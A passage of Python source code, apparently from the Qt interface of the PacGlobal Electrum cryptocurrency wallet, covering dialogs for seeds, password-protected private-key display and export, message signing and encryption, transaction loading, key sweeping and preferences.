grid.addWidget(QLabel(str(seed_available)), 3, 1) if len(keystore_types) <= 1: grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0) ks_type = str(keystore_types[0]) if keystore_types else _('No keystore') grid.addWidget(QLabel(ks_type), 4, 1) vbox.addLayout(grid) if self.wallet.is_deterministic(): mpk_text = ShowQRTextEdit() mpk_text.setMaximumHeight(150) mpk_text.addCopyButton(self.app) def show_mpk(index): mpk_text.setText(mpk_list[index]) mpk_text.repaint() # macOS hack for #4777 # only show the combobox in case multiple accounts are available if len(mpk_list) > 1: def label(key): if isinstance(self.wallet, Multisig_Wallet): return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )' return '' labels = [label(i) for i in range(len(mpk_list))] on_click = lambda clayout: show_mpk(clayout.selected_index()) labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click) vbox.addLayout(labels_clayout.layout()) else: vbox.addWidget(QLabel(_("Master Public Key"))) show_mpk(0) vbox.addWidget(mpk_text) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(dialog))) dialog.setLayout(vbox) dialog.exec_() def remove_wallet(self): if self.question('\n'.join([ _('Delete wallet file?'), "%s"%self.wallet.storage.path, _('If your wallet contains funds, make sure you have saved its seed.')])): self._delete_wallet() @protected def _delete_wallet(self, password): wallet_path = self.wallet.storage.path basename = os.path.basename(wallet_path) r = self.gui_object.daemon.delete_wallet(wallet_path) self.close() if r: self.show_error(_("Wallet removed: {}").format(basename)) else: self.show_error(_("Wallet file not found: {}").format(basename)) @protected def show_seed_dialog(self, password): if not self.wallet.has_seed(): self.show_message(_('This wallet has no seed')) return keystore = self.wallet.get_keystore() try: seed = keystore.get_seed(password) passphrase = keystore.get_passphrase(password) except BaseException as e: self.show_error(str(e)) return from .seed_dialog import SeedDialog d = SeedDialog(self, seed, passphrase) d.exec_() def show_qrcode(self, data, title = _("QR code"), parent=None): if not data: return d = QRDialog(data, parent or self, title) d.exec_() @protected def show_private_key(self, address, password): if not address: return try: pk, redeem_script = self.wallet.export_private_key(address, password) except Exception as e: self.logger.exception('') self.show_message(str(e)) return xtype = bitcoin.deserialize_privkey(pk)[0] d = WindowModalDialog(self, _("Private key")) d.setMinimumSize(600, 150) vbox = QVBoxLayout() vbox.addWidget(QLabel(_("Address") + ': ' + address)) vbox.addWidget(QLabel(_("Script type") + ': ' + xtype)) vbox.addWidget(QLabel(_("Private key") + ':')) keys_e = ShowQRTextEdit(text=pk) keys_e.addCopyButton(self.app) vbox.addWidget(keys_e) if redeem_script: vbox.addWidget(QLabel(_("Redeem Script") + ':')) rds_e = ShowQRTextEdit(text=redeem_script) rds_e.addCopyButton(self.app) vbox.addWidget(rds_e) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) d.exec_() msg_sign = _("Signing with an address actually means signing with the corresponding " "private key, and verifying with the corresponding public key. The " "address you have entered does not have a unique public key, so these " "operations cannot be performed.") + '\n\n' + \ _('The operation is undefined. Not just in PacGlobal Electrum, but in general.') @protected def do_sign(self, address, message, signature, password): address = address.text().strip() message = message.toPlainText().strip() if not bitcoin.is_address(address): self.show_message(_('Invalid PACGlobal address.')) return if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return if not self.wallet.is_mine(address): self.show_message(_('Address not in wallet.')) return txin_type = self.wallet.get_txin_type(address) if txin_type not in ['p2pkh']: self.show_message(_('Cannot sign messages with this type of address:') + \ ' ' + txin_type + '\n\n' + self.msg_sign) return task = partial(self.wallet.sign_message, address, message, password) def show_signed_message(sig): try: signature.setText(base64.b64encode(sig).decode('ascii')) except RuntimeError: # (signature) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=show_signed_message) def do_verify(self, address, message, signature): address = address.text().strip() message = message.toPlainText().strip().encode('utf-8') if not bitcoin.is_address(address): self.show_message(_('Invalid PACGlobal address.')) return try: # This can throw on invalid base64 sig = base64.b64decode(str(signature.toPlainText())) verified = ecc.verify_message_with_address(address, sig, message) except Exception as e: verified = False if verified: self.show_message(_("Signature verified")) else: self.show_error(_("Wrong signature")) def sign_verify_message(self, address=''): d = WindowModalDialog(self, _('Sign/verify Message')) d.setMinimumSize(610, 290) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) address_e = QLineEdit() address_e.setText(address) layout.addWidget(QLabel(_('Address')), 2, 0) layout.addWidget(address_e, 2, 1) signature_e = QTextEdit() signature_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Signature')), 3, 0) layout.addWidget(signature_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Sign")) b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Verify")) b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() @protected def do_decrypt(self, message_e, pubkey_e, encrypted_e, password): if self.wallet.is_watching_only(): self.show_message(_('This is a watching-only wallet.')) return cyphertext = encrypted_e.toPlainText() task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password) def setText(text): try: message_e.setText(text.decode('utf-8')) except RuntimeError: # (message_e) wrapped C/C++ object has been deleted pass self.wallet.thread.add(task, on_success=setText) def do_encrypt(self, message_e, pubkey_e, encrypted_e): message = message_e.toPlainText() message = message.encode('utf-8') try: public_key = ecc.ECPubkey(bfh(pubkey_e.text())) except BaseException as e: self.logger.exception('Invalid Public key') self.show_warning(_('Invalid Public key')) return encrypted = public_key.encrypt_message(message) encrypted_e.setText(encrypted.decode('ascii')) def encrypt_message(self, address=''): d = WindowModalDialog(self, _('Encrypt/decrypt Message')) d.setMinimumSize(610, 490) layout = QGridLayout(d) message_e = QTextEdit() message_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Message')), 1, 0) layout.addWidget(message_e, 1, 1) layout.setRowStretch(2,3) pubkey_e = QLineEdit() if address: pubkey = self.wallet.get_public_key(address) pubkey_e.setText(pubkey) layout.addWidget(QLabel(_('Public key')), 2, 0) layout.addWidget(pubkey_e, 2, 1) encrypted_e = QTextEdit() encrypted_e.setAcceptRichText(False) layout.addWidget(QLabel(_('Encrypted')), 3, 0) layout.addWidget(encrypted_e, 3, 1) layout.setRowStretch(3,1) hbox = QHBoxLayout() b = QPushButton(_("Encrypt")) b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Decrypt")) b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e)) hbox.addWidget(b) b = QPushButton(_("Close")) b.clicked.connect(d.accept) hbox.addWidget(b) layout.addLayout(hbox, 4, 1) d.exec_() def password_dialog(self, msg=None, parent=None): from .password_dialog import PasswordDialog parent = parent or self d = PasswordDialog(parent, msg) return d.run() def tx_from_text(self, txt): from electrum_dash.transaction import tx_from_str try: tx = tx_from_str(txt) return Transaction(tx) except BaseException as e: self.show_critical(_("PacGlobal Electrum was unable to parse your transaction") + ":\n" + str(e)) return def read_tx_from_qrcode(self): from electrum_dash import qrscanner try: data = qrscanner.scan_barcode(self.config.get_video_device()) except BaseException as e: self.show_error(str(e)) return if not data: return # if the user scanned a dash URI if str(data).startswith("dash:"): self.pay_to_URI(data) return # else if the user scanned an offline signed tx try: data = bh2u(bitcoin.base_decode(data, length=None, base=43)) except BaseException as e: self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e))) return tx = self.tx_from_text(data) if not tx: return self.show_transaction(tx) def read_tx_from_file(self): fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn") if not fileName: return try: with open(fileName, "r") as f: file_content = f.read() except (ValueError, IOError, os.error) as reason: self.show_critical(_("PacGlobal Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found")) return return self.tx_from_text(file_content) def do_process_from_text(self): text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction")) if not text: return tx = self.tx_from_text(text) if tx: self.show_transaction(tx) def do_process_from_file(self): tx = self.read_tx_from_file() if tx: self.show_transaction(tx) def do_process_from_txid(self): from electrum_dash import transaction txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':') if ok and txid: txid = str(txid).strip() try: raw_tx = self.network.run_from_another_thread( self.network.get_transaction(txid, timeout=10)) except Exception as e: self.show_message(_("Error getting transaction from network") + ":\n" + str(e)) return tx = transaction.Transaction(raw_tx) self.show_transaction(tx) @protected def export_privkeys_dialog(self, password): if self.wallet.is_watching_only(): self.show_message(_("This is a watching-only wallet")) return if isinstance(self.wallet, Multisig_Wallet): self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' + _('It cannot be "backed up" by simply exporting these private keys.')) d = WindowModalDialog(self, _('Private keys')) d.setMinimumSize(980, 300) vbox = QVBoxLayout(d) msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."), _("Exposing a single private key can compromise your entire wallet!"), _("In particular, DO NOT use 'redeem private key' services proposed by third parties.")) vbox.addWidget(QLabel(msg)) e = QTextEdit() e.setReadOnly(True) vbox.addWidget(e) defaultname = 'electrum-pac-private-keys.csv' select_msg = _('Select file to export your private keys to') hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg) vbox.addLayout(hbox) b = OkButton(d, _('Export')) b.setEnabled(False) vbox.addLayout(Buttons(CancelButton(d), b)) private_keys = {} addresses = self.wallet.get_addresses() done = False cancelled = False def privkeys_thread(): for addr in addresses: time.sleep(0.1) if done or cancelled: break privkey = self.wallet.export_private_key(addr, password)[0] private_keys[addr] = privkey self.computing_privkeys_signal.emit() if not cancelled: self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.emit() def show_privkeys(): s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items())) e.setText(s) b.setEnabled(True) self.show_privkeys_signal.disconnect() nonlocal done done = True def on_dialog_closed(*args): nonlocal done nonlocal cancelled if not done: cancelled = True self.computing_privkeys_signal.disconnect() self.show_privkeys_signal.disconnect() self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses)))) self.show_privkeys_signal.connect(show_privkeys) d.finished.connect(on_dialog_closed) threading.Thread(target=privkeys_thread).start() if not d.exec_(): done = True return filename = filename_e.text() if not filename: return try: self.do_export_privkeys(filename, private_keys, csv_button.isChecked()) except (IOError, os.error) as reason: txt = "\n".join([ _("PacGlobal Electrum was unable to produce a private key-export."), str(reason) ]) self.show_critical(txt, title=_("Unable to create csv")) except Exception as e: self.show_message(str(e)) return self.show_message(_("Private keys exported.")) def do_export_privkeys(self, fileName, pklist, is_csv): with open(fileName, "w+") as f: if is_csv: transaction = csv.writer(f) transaction.writerow(["address", "private_key"]) for addr, pk in pklist.items(): transaction.writerow(["%34s"%addr,pk]) else: f.write(json.dumps(pklist, indent = 4)) def do_import_labels(self): def import_labels(path): def _validate(data): return data # TODO def import_labels_assign(data): for key, value in data.items(): self.wallet.set_label(key, value) import_meta(path, _validate, import_labels_assign) def on_import(): self.need_update.set() import_meta_gui(self, _('labels'), import_labels, on_import) def do_export_labels(self): def export_labels(filename): export_meta(self.wallet.labels, filename) export_meta_gui(self, _('labels'), export_labels) def sweep_key_dialog(self): d = WindowModalDialog(self, title=_('Sweep private keys')) d.setMinimumSize(600, 300) vbox = QVBoxLayout(d) hbox_top = QHBoxLayout() hbox_top.addWidget(QLabel(_("Enter private keys:"))) hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) vbox.addLayout(hbox_top) keys_e = ScanQRTextEdit(allow_multi=True) keys_e.setTabChangesFocus(True) vbox.addWidget(keys_e) addresses = self.wallet.get_unused_addresses() if not addresses: try: addresses = self.wallet.get_receiving_addresses() except AttributeError: addresses = self.wallet.get_addresses() h, address_e = address_field(addresses) vbox.addLayout(h) vbox.addStretch(1) button = OkButton(d, _('Sweep')) vbox.addLayout(Buttons(CancelButton(d), button)) button.setEnabled(False) def get_address(): addr = str(address_e.text()).strip() if bitcoin.is_address(addr): return addr def get_pk(*, raise_on_error=False): text = str(keys_e.toPlainText()) return keystore.get_private_keys(text, raise_on_error=raise_on_error) def on_edit(): valid_privkeys = False try: valid_privkeys = get_pk(raise_on_error=True) is not None except Exception as e: button.setToolTip(f'{_("Error")}: {str(e)}') else: button.setToolTip('') button.setEnabled(get_address() is not None and valid_privkeys) on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet()) keys_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_edit) address_e.textChanged.connect(on_address) on_address(str(address_e.text())) if not d.exec_(): return # user pressed "sweep" addr = get_address() try: self.wallet.check_address(addr) except InternalAddressCorruption as e: self.show_error(str(e)) raise try: coins, keypairs = sweep_preparations(get_pk(), self.network) except Exception as e: # FIXME too broad... self.show_message(str(e)) return self.do_clear() self.tx_external_keypairs = keypairs self.spend_coins(coins) self.payto_e.setText(addr) self.spend_max() self.payto_e.setFrozen(True) self.amount_e.setFrozen(True) self.warn_if_watching_only() def _do_import(self, title, header_layout, func): text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True) if not text: return keys = str(text).split() good_inputs, bad_inputs = func(keys) if good_inputs: msg = '\n'.join(good_inputs[:10]) if len(good_inputs) > 10: msg += '\n...' self.show_message(_("The following addresses were added") + f' ({len(good_inputs)}):\n' + msg) if bad_inputs: msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10]) if len(bad_inputs) > 10: msg += '\n...' self.show_error(_("The following inputs could not be imported") + f' ({len(bad_inputs)}):\n' + msg) self.address_list.update() self.history_list.update() def import_addresses(self): if not self.wallet.can_import_address(): return title, msg = _('Import addresses'), _("Enter addresses")+':' self._do_import(title, msg, self.wallet.import_addresses) @protected def do_import_privkey(self, password): if not self.wallet.can_import_privkey(): return title = _('Import private keys') header_layout = QHBoxLayout() header_layout.addWidget(QLabel(_("Enter private keys")+':')) header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight) self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password)) def update_fiat(self): b = self.fx and self.fx.is_enabled() self.fiat_send_e.setVisible(b) self.fiat_receive_e.setVisible(b) self.history_list.update() self.address_list.refresh_headers() self.address_list.update() self.update_status() def settings_dialog(self): self.need_restart = False d = WindowModalDialog(self, _('Preferences')) vbox = QVBoxLayout() tabs = QTabWidget() tabs.setObjectName("settings_tab") gui_widgets = [] fee_widgets = [] tx_widgets = [] id_widgets = [] # language lang_help = _('Select which language is used in the GUI (after restart).') lang_label = HelpLabel(_('Language') + ':', lang_help) lang_combo = QComboBox() from electrum_dash.i18n import languages lang_combo.addItems(list(languages.values())) lang_keys = list(languages.keys()) lang_cur_setting = self.config.get("language", '') try: index = lang_keys.index(lang_cur_setting) except ValueError: # not in list index = 0 lang_combo.setCurrentIndex(index) if not self.config.is_modifiable('language'): for w in [lang_combo, lang_label]: w.setEnabled(False) def on_lang(x): lang_request = list(languages.keys())[lang_combo.currentIndex()] if lang_request != self.config.get('language'): self.config.set_key("language", lang_request, True) self.need_restart = True lang_combo.currentIndexChanged.connect(on_lang) gui_widgets.append((lang_label, lang_combo)) nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"') nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help) nz = QSpinBox() nz.setMinimum(0) nz.setMaximum(self.decimal_point) nz.setValue(self.num_zeros) if not self.config.is_modifiable('num_zeros'): for w in [nz, nz_label]: w.setEnabled(False) def on_nz(): value = nz.value() if self.num_zeros != value: self.num_zeros = value self.config.set_key('num_zeros', value, True) self.history_list.update() self.address_list.update() nz.valueChanged.connect(on_nz) gui_widgets.append((nz_label, nz)) msg = '\n'.join([ _('Time based: fee rate is based on average confirmation time estimates'), ] ) fee_type_label = HelpLabel(_('Fee estimation') + ':', msg) fee_type_combo = QComboBox() fee_type_combo.addItems([_('Static'), _('ETA')]) fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0) def on_fee_type(x): self.config.set_key('mempool_fees', False) self.config.set_key('dynamic_fees', x>0) self.fee_slider.update() fee_type_combo.currentIndexChanged.connect(on_fee_type) fee_widgets.append((fee_type_label, fee_type_combo)) feebox_cb = QCheckBox(_('Edit fees manually')) feebox_cb.setChecked(self.config.get('show_fee', False)) feebox_cb.setToolTip(_("Show fee edit box in send tab.")) def on_feebox(x): self.config.set_key('show_fee', x == Qt.Checked) self.fee_adv_controls.setVisible(bool(x)) feebox_cb.stateChanged.connect(on_feebox) fee_widgets.append((feebox_cb, None)) msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\ + _('The following alias providers are available:') + '\n'\ + '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\ + 'For more information, see https://openalias.org' alias_label = HelpLabel(_('OpenAlias') + ':', msg) alias = self.config.get('alias','') alias_e = QLineEdit(alias) def set_alias_color(): if not self.config.get('alias'): alias_e.setStyleSheet("") return if self.alias_info: alias_addr, alias_name, validated = self.alias_info alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True)) else: alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) def on_alias_edit(): alias_e.setStyleSheet("") alias = str(alias_e.text()) self.config.set_key('alias', alias, True) if alias: self.fetch_alias() set_alias_color() self.alias_received_signal.connect(set_alias_color) alias_e.editingFinished.connect(on_alias_edit) id_widgets.append((alias_label, alias_e)) # SSL certificate msg = ' '.join([ _('SSL certificate used to sign payment requests.'), _('Use setconfig to set ssl_chain and ssl_privkey.'), ]) if self.config.get('ssl_privkey') or self.config.get('ssl_chain'): try: SSL_identity = paymentrequest.check_ssl_config(self.config) SSL_error = None except BaseException as e: SSL_identity = "error" SSL_error = str(e) else: SSL_identity = "" SSL_error = None SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg) SSL_id_e = QLineEdit(SSL_identity) SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '') if SSL_error: SSL_id_e.setToolTip(SSL_error) SSL_id_e.setReadOnly(True) id_widgets.append((SSL_id_label, SSL_id_e)) units = base_units_list msg = (_('Base unit of your wallet.') + '\n1 PAC = 1000 mPAC. 1 mPAC = 1000 uPAC. 1 uPAC = 100 duffs.\n' + _('This setting affects the Send tab, and all balance related fields.')) unit_label = HelpLabel(_('Base unit') + ':', msg) unit_combo = QComboBox() unit_combo.addItems(units) unit_combo.setCurrentIndex(units.index(self.base_unit())) def on_unit(x, nz): unit_result = units[unit_combo.currentIndex()] if self.base_unit() == unit_result: return edits = self.amount_e, self.fee_e, self.receive_amount_e amounts = [edit.get_amount() for edit in edits] self.decimal_point = base_unit_name_to_decimal_point(unit_result) self.config.set_key('decimal_point', self.decimal_point, True) nz.setMaximum(self.decimal_point) self.history_list.update() self.request_list.update() self.address_list.update() for edit, amount in zip(edits, amounts): edit.setAmount(amount) self.update_status() unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz)) gui_widgets.append((unit_label, unit_combo)) show_dip2_cb = QCheckBox(_('Show DIP2 tx type in wallet history:')) show_dip2_cb.setChecked(self.config.get('show_dip2_tx_type', False)) def on_dip2_state_changed(x): show_dip2 = (x == Qt.Checked) self.config.set_key('show_dip2_tx_type', show_dip2, True) self.history_model.refresh('on_dip2') show_dip2_cb.stateChanged.connect(on_dip2_state_changed) gui_widgets.append((show_dip2_cb, None)) block_explorers = sorted(util.block_explorer_info().keys()) msg = _('Choose which online block explorer to use for functions that open a web browser') block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg) block_ex_combo = QComboBox() block_ex_combo.addItems(block_explorers) block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config))) def on_be(x): be_result = block_explorers[block_ex_combo.currentIndex()] self.config.set_key('block_explorer', be_result, True) block_ex_combo.currentIndexChanged.connect(on_be) gui_widgets.append((block_ex_label, block_ex_combo)) from electrum_dash import qrscanner system_cameras = qrscanner._find_system_cameras() qr_combo = QComboBox() qr_combo.addItem("Default","default") for camera, device in system_cameras.items(): qr_combo.addItem(camera, device) #combo.addItem("Manually specify a device", config.get("video_device")) index = qr_combo.findData(self.config.get("video_device")) qr_combo.setCurrentIndex(index) msg = _("Install the zbar package to enable this.") qr_label = HelpLabel(_('Video Device') + ':', msg) qr_combo.setEnabled(qrscanner.libzbar is not None) on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True) qr_combo.currentIndexChanged.connect(on_video_device) gui_widgets.append((qr_label, qr_combo)) colortheme_combo = QComboBox() colortheme_combo.addItem(_('Light'), 'default') colortheme_combo.addItem(_('Dark'), 'dark') index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default')) colortheme_combo.setCurrentIndex(index) colortheme_label = QLabel(_('Color theme') + ':') def on_colortheme(x): self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True) self.need_restart = True colortheme_combo.currentIndexChanged.connect(on_colortheme) gui_widgets.append((colortheme_label, colortheme_combo)) updatecheck_cb = QCheckBox(_("Automatically check for software updates")) updatecheck_cb.setChecked(self.config.get('check_updates', False)) def on_set_updatecheck(v): self.config.set_key('check_updates', v == Qt.Checked, save=True) updatecheck_cb.stateChanged.connect(on_set_updatecheck) gui_widgets.append((updatecheck_cb, None)) filelogging_cb = QCheckBox(_("Write logs to file")) filelogging_cb.setChecked(bool(self.config.get('log_to_file', False))) def on_set_filelogging(v): self.config.set_key('log_to_file', v == Qt.Checked, save=True) self.need_restart = True filelogging_cb.stateChanged.connect(on_set_filelogging) filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.')) gui_widgets.append((filelogging_cb, None)) usechange_cb = QCheckBox(_('Use change addresses')) usechange_cb.setChecked(self.wallet.use_change) if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False) def on_usechange(x): usechange_result = x == Qt.Checked if self.wallet.use_change != usechange_result: self.wallet.use_change = usechange_result self.wallet.storage.put('use_change', self.wallet.use_change) multiple_cb.setEnabled(self.wallet.use_change) usechange_cb.stateChanged.connect(on_usechange) usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.')) tx_widgets.append((usechange_cb, None)) def on_multiple(x): multiple = x == Qt.Checked if self.wallet.multiple_change != multiple: self.wallet.multiple_change = multiple self.wallet.storage.put('multiple_change', multiple) multiple_change = self.wallet.multiple_change multiple_cb = QCheckBox(_('Use multiple change addresses')) multiple_cb.setEnabled(self.wallet.use_change) multiple_cb.setToolTip('\n'.join([ _('In some cases, use up to 3 change addresses in order to break ' 'up large coin amounts and obfuscate the recipient address.'), _('This may result in higher transactions fees.') ])) multiple_cb.setChecked(multiple_change) multiple_cb.stateChanged.connect(on_multiple) tx_widgets.append((multiple_cb, None)) def fmt_docs(key, klass): lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")] return '\n'.join([key, "", " ".join(lines)]) choosers = sorted(coinchooser.COIN_CHOOSERS.keys()) if len(choosers) > 1: chooser_name = coinchooser.get_name(self.config) msg = _('Choose coin (UTXO) selection method. The following are available:\n\n') msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items()) chooser_label = HelpLabel(_('Coin selection') + ':', msg) chooser_combo = QComboBox() chooser_combo.addItems(choosers) i = choosers.index(chooser_name) if chooser_name in choosers else 0 chooser_combo.setCurrentIndex(i) def on_chooser(x): chooser_name = choosers[chooser_combo.currentIndex()] self.config.set_key('coin_chooser', chooser_name) chooser_combo.currentIndexChanged.connect(on_chooser) tx_widgets.append((chooser_label, chooser_combo)) def on_unconf(x): self.config.set_key('confirmed_only', bool(x)) conf_only = self.config.get('confirmed_only', False) unconf_cb = QCheckBox(_('Spend only confirmed coins')) unconf_cb.setToolTip(_('Spend only confirmed inputs.')) unconf_cb.setChecked(conf_only) unconf_cb.stateChanged.connect(on_unconf) tx_widgets.append((unconf_cb, None)) def on_outrounding(x): self.config.set_key('coin_chooser_output_rounding', bool(x)) enable_outrounding = self.config.get('coin_chooser_output_rounding', False) outrounding_cb = QCheckBox(_('Enable output value rounding')) outrounding_cb.setToolTip( _('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' + _('This might improve your privacy somewhat.') + '\n' + _('If enabled, at most 100 duffs might be lost due to this, per transaction.')) outrounding_cb.setChecked(enable_outrounding) outrounding_cb.stateChanged.connect(on_outrounding) tx_widgets.append((outrounding_cb, None)) # Fiat Currency hist_checkbox = QCheckBox() hist_capgains_checkbox = QCheckBox() fiat_address_checkbox = QCheckBox() ccy_combo = QComboBox() ex_combo = QComboBox() def update_currencies(): if not self.fx: return currencies = sorted(self.fx.get_currencies(self.fx.get_history_config())) ccy_combo.clear() ccy_combo.addItems([_('None')] + currencies) if self.fx.is_enabled(): ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency())) def update_history_cb(): if not self.fx: return hist_checkbox.setChecked(self.fx.get_history_config()) hist_checkbox.setEnabled(self.fx.is_enabled()) def update_fiat_address_cb(): if not self.fx: return fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config()) def update_history_capgains_cb(): if not self.fx: return hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config()) hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked()) def update_exchanges(): if not self.fx: return b = self.fx.is_enabled() ex_combo.setEnabled(b) if b: h = self.fx.get_history_config() c = self.fx.get_currency() exchanges = self.fx.get_exchanges_by_ccy(c, h) else: exchanges = self.fx.get_exchanges_by_ccy('USD', False) ex_combo.blockSignals(True) ex_combo.clear() ex_combo.addItems(sorted(exchanges)) ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange())) ex_combo.blockSignals(False) def on_currency(hh): if not self.fx: return b = bool(ccy_combo.currentIndex()) ccy = str(ccy_combo.currentText()) if b else None self.fx.set_enabled(b) if b and ccy != self.fx.ccy: self.fx.set_currency(ccy) update_history_cb() update_exchanges() self.update_fiat() def on_exchange(idx): exchange = str(ex_combo.currentText()) if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name(): self.fx.set_exchange(exchange) def on_history(checked): if not self.fx: return self.fx.set_history_config(checked) update_exchanges() self.history_model.refresh('on_history') if self.fx.is_enabled() and checked: self.fx.trigger_update() update_history_capgains_cb() def on_history_capgains(checked): if not self.fx: return self.fx.set_history_capital_gains_config(checked) self.history_model.refresh('on_history_capgains') def on_fiat_address(checked): if not self.fx: return self.fx.set_fiat_address_config(checked) self.address_list.refresh_headers() self.address_list.update() update_currencies() update_history_cb() update_history_capgains_cb() update_fiat_address_cb() update_exchanges() ccy_combo.currentIndexChanged.connect(on_currency) hist_checkbox.stateChanged.connect(on_history) hist_capgains_checkbox.stateChanged.connect(on_history_capgains) fiat_address_checkbox.stateChanged.connect(on_fiat_address) ex_combo.currentIndexChanged.connect(on_exchange) fiat_widgets = [] fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo)) fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox)) fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox)) fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox)) fiat_widgets.append((QLabel(_('Source')), ex_combo)) tabs_info = [ (fee_widgets, _('Fees')), (tx_widgets, _('Transactions')), (gui_widgets, _('General')), (fiat_widgets, _('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.trigger_update() self.alias_received_signal.disconnect(set_alias_color) run_hook('close_settings_dialog') if self.need_restart: self.show_warning(_('Please restart PacGlobal Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.network.unregister_callback(self.on_quotes) self.network.unregister_callback(self.on_history) self.wallet.protx_manager.clean_up() self.network.dash_net.unregister_callback(self.on_dash_net) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.config.set_key("console-history", self.console.history[-50:], True) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('PacGlobal Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and 